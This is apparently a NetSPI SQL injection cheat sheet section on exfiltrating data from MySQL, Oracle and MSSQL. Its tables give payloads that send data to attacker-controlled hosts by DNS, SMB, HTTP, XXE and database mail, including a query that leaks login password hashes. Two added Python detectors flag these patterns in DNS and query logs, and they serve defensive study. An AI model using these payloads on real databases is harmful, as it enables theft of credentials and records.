Exfiltrating data makes analysis easier and leaves the attacker an offline copy of any compromised data. Data can be exfiltrated through files, various layer 4 requests, and hidden techniques. The queries in this table are for MySQL.
* Requires privileged user
| Description | Query |
|---|---|
| DNS Request | `SELECT LOAD_FILE(concat('\\\\',(QUERY_WITH_ONLY_ONE_ROW), '.yourhost.com\\'))` |
| SMB Share | `SELECT * FROM USERS INTO OUTFILE '\\attacker\SMBshare\output.txt'` |
| HTTP Server | `SELECT * FROM USERS INTO OUTFILE '/var/www/html/output.txt'` |
| Numeric Concatenation (when data can only be exported as numbers, convert it to ASCII codes; for automation see here) | `SELECT length(user())` then `SELECT ASCII(substr(user(),1))` |
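The DNS Request row above (and the UNC-path rows in the MSSQL table further down) all work the same way on the wire: the stolen value becomes the leftmost label of a name under a domain the attacker controls, and the database server's resolver sends that name out in a query. That makes the resolver's query log the natural place to detect it. The following is an added detection example, not code from NetSPI or from this cheat sheet; the log line format (`timestamp client qname qtype`), the sample lines, the internal-zone allowlist and the thresholds are all assumptions chosen for the example.

```python
import math
import re
from dataclasses import dataclass, field

# Constructed sample DNS query log (not real traffic). Assumed line format:
# "<timestamp> <client_ip> <queried_name> <qtype>". Lines 3 and 4 imitate the
# shape of the DNS-based exfil rows on this page: data pushed into the leftmost
# label of a name under an attacker-controlled domain.
SAMPLE_DNS_LOG = """\
2024-05-01T10:00:01Z 10.0.2.15 www.example.com A
2024-05-01T10:00:02Z 10.0.2.15 dbsrv01.corp.example.internal A
2024-05-01T10:00:03Z 10.0.2.15 sa-0x0200a1b2c3d4e5f60718293a4b5c6d7e8f9.yourhost.com A
2024-05-01T10:00:04Z 10.0.2.15 root@localhost.yourhost.com A
2024-05-01T10:00:05Z 10.0.2.15 updates.example.com AAAA
"""

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+(?P<qtype>\S+)$")
HEX_RUN_RE = re.compile(r"(?:0x)?[0-9a-f]{16,}", re.IGNORECASE)  # e.g. fn_varbintohexstr output
HOSTNAME_CHARS_RE = re.compile(r"[^A-Za-z0-9-]")                   # '@', '=', '%' never belong in a label


def shannon_entropy(text: str) -> float:
    """Bits per character; hex- or base64-like payload labels score high."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


@dataclass
class Finding:
    client: str
    qname: str
    reasons: list = field(default_factory=list)


def label_reasons(label: str, max_len: int = 30, min_entropy: float = 3.5) -> list:
    """Return the reasons a single DNS label looks like it carries exfiltrated data."""
    reasons = []
    if HEX_RUN_RE.search(label):
        reasons.append("hex-encoded run in label")
    if len(label) > max_len:
        reasons.append(f"label length {len(label)} exceeds {max_len}")
    if len(label) >= 12 and shannon_entropy(label) > min_entropy:
        reasons.append("high-entropy label")
    if HOSTNAME_CHARS_RE.search(label):
        reasons.append("non-hostname characters in label")
    return reasons


def scan_dns_log(text: str, internal_suffixes=(".corp.example.internal",)) -> list:
    """Flag queries whose labels below the registrable domain look like payload.

    internal_suffixes is an assumed allowlist of the organisation's own zones;
    queries under them are skipped so ordinary host lookups do not alert.
    """
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        qname = m["qname"].rstrip(".")
        if qname.lower().endswith(internal_suffixes):
            continue
        labels = qname.split(".")
        # Simplification: treat the last two labels as the registrable domain.
        # Production code would consult a public-suffix list instead.
        reasons = []
        for label in labels[:-2]:
            reasons.extend(label_reasons(label))
        if reasons:
            findings.append(Finding(m["client"], qname, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"{f.client} -> {f.qname}: {'; '.join(f.reasons)}")
```

Run against the sample, only the two `yourhost.com` names are reported: the first for its hex run and excessive length, the second because `root@localhost` (what `user()` returns) contains a character no legitimate hostname label has. Alerting on the source being a database server, rather than a workstation, is the cheapest additional filter in practice.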
The following queries are for Oracle.
* Requires privileged user
| Description | Query |
|---|---|
| Combine multiple rows into one value | `SELECT dbms_xmlgen.getxmltype('select user from dual') FROM dual` |
| XML External Entity | `SELECT xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://IP/test"> %remote; %param1;]>') FROM dual;` |
| UTL_HTTP Request (Pre-11gR2) | `SELECT UTL_HTTP.request('http://IP/test') FROM dual;` |
| Escaping special characters | `SELECT UTL_URL.escape('http://IP/' \|\| USER) FROM dual;` |
The following queries are for MSSQL.
Note: It is possible to make a DNS request from MSSQL. However, this request requires administrator privileges and SQL Server 2005.
| Description | Query |
|---|---|
| Make DNS Request | `DECLARE @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.netspi.com' from sys.sql_logins; exec('xp_fileexist "\\' + @host + '\c$\boot.ini"');` |
| UNC Path (DNS Request); the UNC Path Injection Cheatsheet can be found here | `xp_dirtree '\\data.domain.com\file'` |
| Enable sp_send_dbmail and send query | `sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure 'Database Mail XPs', 1; RECONFIGURE; exec msdb..sp_send_dbmail @recipients='harold@netspi.com', @query='select @@version';` |
| Basic xp_sendmail Query | `EXEC master..xp_sendmail 'harold@netspi.com', 'This is a test.'` |
| Send Full Email with xp_sendmail | `EXEC xp_sendmail @recipients='harold@netspi.com', @message='This is a test.', @copy_recipients='test@netspi.com', @subject='TEST'` |
| Send Query Results Via xp_sendmail | `EXEC xp_sendmail 'harold@netspi.com', @query='SELECT @@version';` |
| Send Query Results as Attachment Via xp_sendmail | `CREATE TABLE ##texttab (c1 text) INSERT ##texttab values ('Put message here.') DECLARE @cmd varchar(56) SET @cmd = 'SELECT c1 from ##texttab' EXEC master.dbo.xp_sendmail 'robertk', @query = @cmd, @no_header='TRUE' DROP TABLE ##texttab` |
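Every row in the MySQL, Oracle and MSSQL tables above leaves a distinctive token in the statement itself (`LOAD_FILE` with a UNC prefix, `INTO OUTFILE`, `UTL_HTTP.request`, a `DOCTYPE` inside `xmltype()`, `xp_dirtree` with a UNC path, `sp_send_dbmail`, or `sp_configure 'Database Mail XPs', 1`), so a database audit or general query log can be screened for them. The following is an added example of that screening, not code from NetSPI or from this cheat sheet; the log format (`dbms user statement`), the sample lines and the rule names are assumptions made for the example, and the attacker hosts in the samples are placeholders.

```python
import re
from dataclasses import dataclass

# Constructed sample database query-audit log (not real). Assumed line format:
# "<dbms> <db_user> <statement>". The statements mirror the exfil queries in
# the MySQL, Oracle and MSSQL tables on this page, with placeholder hosts.
SAMPLE_QUERY_LOG = r"""
mysql app_ro SELECT id, email FROM users WHERE id = 42
mysql app_rw SELECT LOAD_FILE(concat('\\\\', (SELECT user()), '.yourhost.com\\'))
mysql app_rw SELECT * FROM users INTO OUTFILE '/var/www/html/output.txt'
oracle hr SELECT ename FROM emp WHERE deptno = 10
oracle hr SELECT UTL_HTTP.request('http://IP/test') FROM dual
oracle hr SELECT xmltype('<?xml version="1.0"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://IP/test"> %remote; ]>') FROM dual
mssql svc_web SELECT TOP 10 name FROM sys.objects
mssql svc_web EXEC master..xp_dirtree '\\data.domain.com\file'
mssql svc_web sp_configure 'Database Mail XPs', 1; RECONFIGURE; exec msdb..sp_send_dbmail @recipients='mail@example.com', @query='select @@version'
""".strip("\n")

LINE_RE = re.compile(r"^(?P<dbms>\S+)\s+(?P<user>\S+)\s+(?P<stmt>.+)$")

# (dbms, rule name, pattern). Patterns are matched case-insensitively against
# the whole statement; `\\\\` in a raw regex matches two literal backslashes,
# i.e. the start of a UNC path, which is what turns a file call into an
# outbound DNS/SMB request.
RULES = [
    ("mysql", "LOAD_FILE with UNC path (DNS/SMB exfil)", r"\bload_file\s*\(.*\\\\"),
    ("mysql", "INTO OUTFILE/DUMPFILE write", r"\binto\s+(?:out|dump)file\b"),
    ("oracle", "UTL_HTTP outbound request", r"\butl_http\."),
    ("oracle", "XML external entity in xmltype()", r"\bxmltype\s*\(.*<!(?:doctype|entity)\b"),
    ("oracle", "dbms_xmlgen row aggregation", r"\bdbms_xmlgen\.getxml"),
    ("mssql", "UNC path via xp_dirtree/xp_fileexist/xp_subdirs", r"\bxp_(?:dirtree|fileexist|subdirs)\b.*\\\\"),
    ("mssql", "Database Mail / xp_sendmail use", r"\b(?:sp_send_dbmail|xp_sendmail)\b"),
    ("mssql", "enabling Database Mail XPs", r"\bsp_configure\s+'database mail xps'\s*,\s*1\b"),
]
COMPILED = [(d, n, re.compile(p, re.IGNORECASE | re.DOTALL)) for d, n, p in RULES]


@dataclass
class Hit:
    line_no: int
    dbms: str
    user: str
    rule: str


def matching_rules(dbms: str, stmt: str) -> list:
    """Names of the rules for this DBMS whose pattern matches the statement."""
    return [name for d, name, rx in COMPILED if d == dbms.lower() and rx.search(stmt)]


def scan_query_log(text: str) -> list:
    """One Hit per (line, rule) pair; a line can trigger several rules."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        for rule in matching_rules(m["dbms"], m["stmt"]):
            hits.append(Hit(line_no, m["dbms"].lower(), m["user"], rule))
    return hits


if __name__ == "__main__":
    for h in scan_query_log(SAMPLE_QUERY_LOG):
        print(f"line {h.line_no} [{h.dbms}/{h.user}] {h.rule}")
```

The ordinary application queries (lines 1, 4 and 7 of the sample) produce no hits; the last MSSQL line produces two, because enabling Database Mail and then calling `sp_send_dbmail` in the same batch is itself worth a separate rule. Rules are keyed by DBMS so that, for example, `xp_dirtree` in a MySQL log is not mistaken for a hit. Pairing these alerts with the principal that ran the statement (the `user` field) is what turns a signature match into an incident: an application service account should never be issuing any of these.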
© 2024 Copyright by NetSPI. All rights reserved.